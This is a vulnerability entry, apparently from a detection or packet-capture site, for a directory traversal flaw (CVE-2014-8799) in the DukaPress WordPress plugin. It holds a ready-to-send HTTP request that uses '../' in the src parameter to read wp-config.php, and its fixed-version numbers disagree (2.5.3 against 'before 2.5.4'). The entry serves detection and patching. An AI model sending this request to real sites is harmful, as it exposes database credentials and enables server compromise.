| Title | WordPress Plugin DukaPress 2.5.2 - Directory Traversal |
|---|---|
| Author | daffainfo |
| Severity | Medium |
| Impact | An attacker can exploit this vulnerability to gain unauthorized access to sensitive files, potentially leading to further compromise of the server. |
| Remediation | Update to the latest version of DukaPress plugin (2.5.3 or higher) which contains a fix for this vulnerability. |
| CVSS Score | 5 |
| EPSS Score | 0.88094 |
| CVE ID | CVE-2014-8799 |
| CWE ID | CWE-22 |
| Tags | cve2014 cve wordpress wp-plugin lfi edb dukapress vuln |
A directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php.
GET /wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2014/CVE-2014-8799.yaml
🦈 Packet Capture: ⬇️ Download cve-2014-8799.pcap
N/AN/A